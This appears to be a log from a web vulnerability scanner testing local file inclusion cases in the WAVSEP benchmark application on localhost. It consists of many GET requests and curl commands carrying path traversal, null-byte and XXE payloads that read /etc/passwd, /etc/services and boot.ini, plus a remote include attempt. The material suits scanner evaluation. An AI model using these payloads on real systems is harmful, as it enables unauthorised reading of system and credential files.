curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
